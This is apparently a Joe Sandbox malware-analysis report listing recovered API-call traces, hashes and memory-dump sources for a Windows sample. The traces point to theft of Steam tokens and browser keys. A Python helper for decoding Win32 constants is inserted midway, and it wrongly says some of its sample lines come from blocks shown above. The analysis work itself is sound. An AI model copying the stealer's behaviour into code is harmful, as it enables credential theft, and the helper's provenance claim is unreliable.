                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: f0546c35ecb6ef8b7d89db39d538e8e611bb63bc1ac6a9567914de554b1879cd
                                • Instruction ID: e7759421be404d7b3ec5c4c2a80485dfe4fb6fc666f700e5a572a745087dad90
                                • Opcode Fuzzy Hash: f0546c35ecb6ef8b7d89db39d538e8e611bb63bc1ac6a9567914de554b1879cd
                                • Instruction Fuzzy Hash: C641C6B1A50119ABCB55FB68DC52EED73BAFF48300F00459DF61A97290DE709E848F94
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006BECDF
                                • lstrlen.KERNEL32(00000000), ref: 006BECF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BED1D
                                • lstrlen.KERNEL32(00000000), ref: 006BED24
                                • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 006BED52
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: steam_tokens.txt
                                • API String ID: 367037083-401951677
                                • Opcode ID: 1e8872e68ee7e54ba6831340868ca0090aacc87b5cd97bdb6aa4c90ae0c68864
                                • Instruction ID: e176e3f7edcbb3eeefc1bae4863d57a452b68b6f7383a626b314f8a809cf5cd8
                                • Opcode Fuzzy Hash: 1e8872e68ee7e54ba6831340868ca0090aacc87b5cd97bdb6aa4c90ae0c68864
                                • Instruction Fuzzy Hash: 6331A2B1B511165BC761BB7AEC1AAEE7BA7AF42300F040168F946CB322EF24DC454BC5
                                APIs
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,006A140E), ref: 006A9A9A
                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,006A140E), ref: 006A9AB0
                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,006A140E), ref: 006A9AC7
                                • ReadFile.KERNEL32(00000000,00000000,?,006A140E,00000000,?,?,?,006A140E), ref: 006A9AE0
                                • LocalFree.KERNEL32(?,?,?,?,006A140E), ref: 006A9B00
                                • CloseHandle.KERNEL32(00000000,?,?,?,006A140E), ref: 006A9B07
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: ac2274580579ae24cf1bca38e1d88c99f14d0cbe36e584ebc7d88969cf13ab13
                                • Instruction ID: d0f03dbae4ce9660a4acb521ffe869892a9d4d92987b435672f8b50c99dea69d
                                • Opcode Fuzzy Hash: ac2274580579ae24cf1bca38e1d88c99f14d0cbe36e584ebc7d88969cf13ab13
                                • Instruction Fuzzy Hash: B1111F71601209AFDB10EF69DD84EAB776DFB05744F20426AF91596280EB709D40CB70
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006C5B14
                                  • Part of subcall function 006CA173: std::exception::exception.LIBCMT ref: 006CA188
                                  • Part of subcall function 006CA173: std::exception::exception.LIBCMT ref: 006CA1AE
                                • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 006C5B7C
                                • memmove.MSVCRT(00000000,?,?), ref: 006C5B89
                                • memmove.MSVCRT(00000000,?,?), ref: 006C5B98
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long
                                • API String ID: 2052693487-3788999226
                                • Opcode ID: fb29532ee2517c8e79199d0b7b9689867ef1c0e503a2d7e11f8f056be9da22b2
                                • Instruction ID: 749eefeacd8278c6e2686c2f33959f14d1ca572b5909c717c32f5924c7d80cf8
                                • Opcode Fuzzy Hash: fb29532ee2517c8e79199d0b7b9689867ef1c0e503a2d7e11f8f056be9da22b2
                                • Instruction Fuzzy Hash: 64414F71B005199FCB08DF68CD95ABEBBA6EB88310F15826DE91AE7344D630AD418B90
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006B7D58
                                  • Part of subcall function 006CA1C0: std::exception::exception.LIBCMT ref: 006CA1D5
                                  • Part of subcall function 006CA1C0: std::exception::exception.LIBCMT ref: 006CA1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 006B7D76
                                • std::_Xinvalid_argument.LIBCPMT ref: 006B7D91
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                • String ID: invalid string position$string too long
                                • API String ID: 3310641104-4289949731
                                • Opcode ID: a118a7f0045c642674dde3451d314de9d2eeef8104b183a2476f01ea484444f5
                                • Instruction ID: fd91a81b2608af89785656b03720bfdf60c2790a5d23ca3bd0fb36d82013dfbd
                                • Opcode Fuzzy Hash: a118a7f0045c642674dde3451d314de9d2eeef8104b183a2476f01ea484444f5
                                • Instruction Fuzzy Hash: 0921D5713082044BD720DE6CD880ABAB7E7EFE1790B244A6EE442CB741D770DC818765
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006C33EF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C33F6
                                • GlobalMemoryStatusEx.KERNEL32 ref: 006C3411
                                • wsprintfA.USER32 ref: 006C3437
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB
                                • API String ID: 2922868504-2651807785
                                • Opcode ID: 66bc35d0a0829a74b3182bc1d05d08a572030edb1dfad1e4ac5a9e4286800b84
                                • Instruction ID: 71719cca5a9ed54fc4b82483531287cda0a6d2451833270a777608ad939c4ecf
                                • Opcode Fuzzy Hash: 66bc35d0a0829a74b3182bc1d05d08a572030edb1dfad1e4ac5a9e4286800b84
                                • Instruction Fuzzy Hash: E101B5B1A04618ABDB04DF98DD49FBEB7B9FB44710F00422EF906E7380DB745D0086A5
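The API listings in these function blocks give their arguments as raw hex immediates, so triage means decoding Win32 constants by hand: 0x1A passed to SHGetFolderPathA is CSIDL_APPDATA, 0x80000001 is HKEY_CURRENT_USER, 0x20119 is KEY_READ with KEY_WOW64_64KEY set, 0x40 to LocalAlloc is LPTR, and CreateFileA's 80000000/00000001/00000003 are GENERIC_READ, FILE_SHARE_READ and OPEN_EXISTING. The Python below is an added helper, not part of the Joe Sandbox report or the IDA plugin. It parses lines in the report's own `Api.MODULE(args), ref: addr` format (the sample lines are copied from the blocks above and from the RegOpenKeyExA block that follows) and decodes only the parameters that are constants, leaving pointer-valued and unrecovered (`?`) arguments alone. The constant tables are standard Windows SDK values supplied here; the report itself does not name them.

```python
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Union

# Lines copied verbatim from the function blocks of this report.
API_LINES = [
    "CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,006A140E), ref: 006A9A9A",
    "SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006BEA24",
    "RegOpenKeyExA.ADVAPI32(80000001,0133D980,00000000,00020119,?), ref: 006BD7F5",
    "LocalAlloc.KERNEL32(00000040,?), ref: 006A9CDA",
    'StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 006A9D03',
    "std::_Xinvalid_argument.LIBCPMT ref: 006C5B14",
]

Arg = Union[int, str, None]   # hex immediate, string literal, or '?' (not recovered)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]
    ref: int                  # address of the call site


# "Api.MODULE(arg,arg,...), ref: ADDR"; the argument list is absent for some CRT calls.
LINE_RE = re.compile(
    r"^(?P<api>[\w:]+)\.(?P<module>\w+)(?:\((?P<args>.*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")


def parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None               # the sandbox could not recover this value
    if HEX_RE.match(tok):
        return int(tok, 16)       # eight-digit hex immediate (constant or pointer)
    return tok                    # string literal, e.g. steam_tokens.txt


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = LINE_RE.match(line.strip().lstrip("•").strip())
    if not m:
        return None
    raw = m["args"]
    args = [parse_arg(t) for t in raw.split(",")] if raw else []
    return ApiCall(m["api"], m["module"], args, int(m["ref"], 16))


# Standard Windows SDK constants (single-bit flags in the *_FLAGS tables).
HKEY = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
        0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
REG_ACCESS = {0x1: "KEY_QUERY_VALUE", 0x2: "KEY_SET_VALUE", 0x4: "KEY_CREATE_SUB_KEY",
              0x8: "KEY_ENUMERATE_SUB_KEYS", 0x10: "KEY_NOTIFY", 0x20: "KEY_CREATE_LINK",
              0x100: "KEY_WOW64_64KEY", 0x200: "KEY_WOW64_32KEY", 0x10000: "DELETE",
              0x20000: "READ_CONTROL", 0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER",
              0x100000: "SYNCHRONIZE"}
CSIDL = {0x00: "CSIDL_DESKTOP", 0x05: "CSIDL_PERSONAL", 0x10: "CSIDL_DESKTOPDIRECTORY",
         0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA", 0x26: "CSIDL_PROGRAM_FILES",
         0x28: "CSIDL_PROFILE"}
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
LOCALALLOC = {0x0: "LMEM_FIXED", 0x2: "LMEM_MOVEABLE",
              0x40: "LPTR (LMEM_FIXED|LMEM_ZEROINIT)", 0x42: "LHND (LMEM_MOVEABLE|LMEM_ZEROINIT)"}


def decode_flags(value: int, table: Dict[int, str]) -> str:
    """Split a bitmask into named flags; unknown bits are kept as a hex residue."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(bit for bit in table if value & bit)
    if rest:
        names.append(f"0x{rest:X}")
    return "|".join(names) if names else "0"


def lookup(table: Dict[int, str]) -> Callable[[int], str]:
    return lambda v: table.get(v, f"0x{v:X}")


def flags(table: Dict[int, str]) -> Callable[[int], str]:
    return lambda v: decode_flags(v, table)


# api -> {argument index: (parameter name, decoder)}; only constant-valued parameters.
DECODERS = {
    "RegOpenKeyExA": {0: ("hKey", lookup(HKEY)), 3: ("samDesired", flags(REG_ACCESS))},
    "SHGetFolderPathA": {1: ("nFolder", lookup(CSIDL))},
    "CreateFileA": {1: ("dwDesiredAccess", flags(GENERIC)), 2: ("dwShareMode", flags(SHARE)),
                    4: ("dwCreationDisposition", lookup(DISPOSITION))},
    "LocalAlloc": {0: ("uFlags", lookup(LOCALALLOC))},
}


def decode_call(call: ApiCall) -> Dict[str, str]:
    out: Dict[str, str] = {}
    for idx, (name, fn) in DECODERS.get(call.api, {}).items():
        if idx >= len(call.args):
            continue
        arg = call.args[idx]
        out[name] = fn(arg) if isinstance(arg, int) else "?"
    return out


if __name__ == "__main__":
    for line in API_LINES:
        call = parse_api_line(line)
        if call:
            print(f"{call.ref:08X} {call.api:<24} {decode_call(call)}")
```

KEY_WOW64_64KEY on a registry open from a 32-bit image means the sample deliberately asks for the 64-bit registry view; the decoder reports any bits it cannot name as a residual hex value rather than guessing, and ignores arguments that are pointers (the subkey and value-name addresses 0133D980 and 0133EE60 in the RegOpenKeyExA/RegQueryValueExA calls).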
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,0133D980,00000000,00020119,?), ref: 006BD7F5
                                • RegQueryValueExA.ADVAPI32(?,0133EE60,00000000,00000000,00000000,000000FF), ref: 006BD819
                                • RegCloseKey.ADVAPI32(?), ref: 006BD823
                                • lstrcat.KERNEL32(?,00000000), ref: 006BD848
                                • lstrcat.KERNEL32(?,0133EE18), ref: 006BD85C
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValue
                                • String ID:
                                • API String ID: 690832082-0
                                • Opcode ID: 6ff096ad29c15193d37359863fad50c2bb989c66e4b86a84037bdf2679a53f75
                                • Instruction ID: d5f8c2b36b1967eac90414928bb847cd2fc6e961d5fe22f541407ee5e001cd2d
                                • Opcode Fuzzy Hash: 6ff096ad29c15193d37359863fad50c2bb989c66e4b86a84037bdf2679a53f75
                                • Instruction Fuzzy Hash: 234163B5A1010DAFCBA4FF68EC92FDD77B5BB44304F004169B60997251EE30AE858F95
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 006B7F31
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B7F60
                                • StrCmpCA.SHLWAPI(00000000,006D4C3C), ref: 006B7FA5
                                • StrCmpCA.SHLWAPI(00000000,006D4C3C), ref: 006B7FD3
                                • StrCmpCA.SHLWAPI(00000000,006D4C3C), ref: 006B8007
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: e9797b4d212494464ea4141e7eb778adac162d934fe88e5e633890d047ef1135
                                • Instruction ID: 05a45d613a06e2dced8fb46b3fcf2b2551d01da095ff98f910e9793169aa813c
                                • Opcode Fuzzy Hash: e9797b4d212494464ea4141e7eb778adac162d934fe88e5e633890d047ef1135
                                • Instruction Fuzzy Hash: 9F4190B0504116DFCB20DF58D484EEE77B9FF94340B110199E806AB351DB70EA96CB95
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 006B80BB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B80EA
                                • StrCmpCA.SHLWAPI(00000000,006D4C3C), ref: 006B8102
                                • lstrlen.KERNEL32(00000000), ref: 006B8140
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B816F
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 3b9d74ea0f21dd9e6eca773fc1a0d6e99e6ddb0bdbeb7171b7839ec420a03dfc
                                • Instruction ID: e512690746ed99c6a7c25257edeb91d5807f34d75b2a83d8bbf4b083b2071aa4
                                • Opcode Fuzzy Hash: 3b9d74ea0f21dd9e6eca773fc1a0d6e99e6ddb0bdbeb7171b7839ec420a03dfc
                                • Instruction Fuzzy Hash: A8416BB5601107AFCB21EF6CD948BEABBBAAF44740F10855DA84997214EE34DD86CB90
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 006C1B72
                                  • Part of subcall function 006C1820: lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006C184F
                                  • Part of subcall function 006C1820: lstrlen.KERNEL32(01326C00), ref: 006C1860
                                  • Part of subcall function 006C1820: lstrcpy.KERNEL32(00000000,00000000), ref: 006C1887
                                  • Part of subcall function 006C1820: lstrcat.KERNEL32(00000000,00000000), ref: 006C1892
                                  • Part of subcall function 006C1820: lstrcpy.KERNEL32(00000000,00000000), ref: 006C18C1
                                  • Part of subcall function 006C1820: lstrlen.KERNEL32(006D4FA0), ref: 006C18D3
                                  • Part of subcall function 006C1820: lstrcpy.KERNEL32(00000000,00000000), ref: 006C18F4
                                  • Part of subcall function 006C1820: lstrcat.KERNEL32(00000000,006D4FA0), ref: 006C1900
                                  • Part of subcall function 006C1820: lstrcpy.KERNEL32(00000000,00000000), ref: 006C192F
                                • sscanf.NTDLL ref: 006C1B9A
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 006C1BB6
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 006C1BC6
                                • ExitProcess.KERNEL32 ref: 006C1BE3
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                • String ID:
                                • API String ID: 3040284667-0
                                • Opcode ID: fad48690a1a0016950f448027e561775919e98371822319fd8ac66d5dd9e93e1
                                • Instruction ID: bbfd28a0f7408124c06efe65adcedbe75bc6d29a2e9ef1364a3970a2830f29b6
                                • Opcode Fuzzy Hash: fad48690a1a0016950f448027e561775919e98371822319fd8ac66d5dd9e93e1
                                • Instruction Fuzzy Hash: F121E6B1518301AF8350EF65D88496BBBF9FFC9214F404A1EF599C3220E730DA048BA6
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006C3166
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C316D
                                • RegOpenKeyExA.ADVAPI32(80000002,0132B820,00000000,00020119,?), ref: 006C318C
                                • RegQueryValueExA.ADVAPI32(?,0133DC00,00000000,00000000,00000000,000000FF), ref: 006C31A7
                                • RegCloseKey.ADVAPI32(?), ref: 006C31B1
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 3d2b513118a18f5d4a4cdf3d13958a048baec29ce50c4d681eef99f7e9e5cca3
                                • Instruction ID: e565cc00b96e6e99d2439b8e8f5e52d22b89f3284e6bef175f6348e91893faea
                                • Opcode Fuzzy Hash: 3d2b513118a18f5d4a4cdf3d13958a048baec29ce50c4d681eef99f7e9e5cca3
                                • Instruction Fuzzy Hash: 0F112E76A41215AFD710DB94ED45FAABBB9F744711F00422AFA0592680DB7559008BA1
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: String___crt$Type
                                • String ID:
                                • API String ID: 2109742289-3916222277
                                • Opcode ID: 6ee1dafba3989b5bcdec843ebc03aec4339cbf968e020fd18d783047e6c35333
                                • Instruction ID: fb6a651b763664b8049e395997ae5f824c471e12c3b99ec50da5b7a94d7efad6
                                • Opcode Fuzzy Hash: 6ee1dafba3989b5bcdec843ebc03aec4339cbf968e020fd18d783047e6c35333
                                • Instruction Fuzzy Hash: 3541D37050479CAEDB218A248C89FFB7BFADB45704F1844ECE9CA86182E2759B458F74
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006A8996
                                  • Part of subcall function 006CA1C0: std::exception::exception.LIBCMT ref: 006CA1D5
                                  • Part of subcall function 006CA1C0: std::exception::exception.LIBCMT ref: 006CA1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 006A89CD
                                  • Part of subcall function 006CA173: std::exception::exception.LIBCMT ref: 006CA188
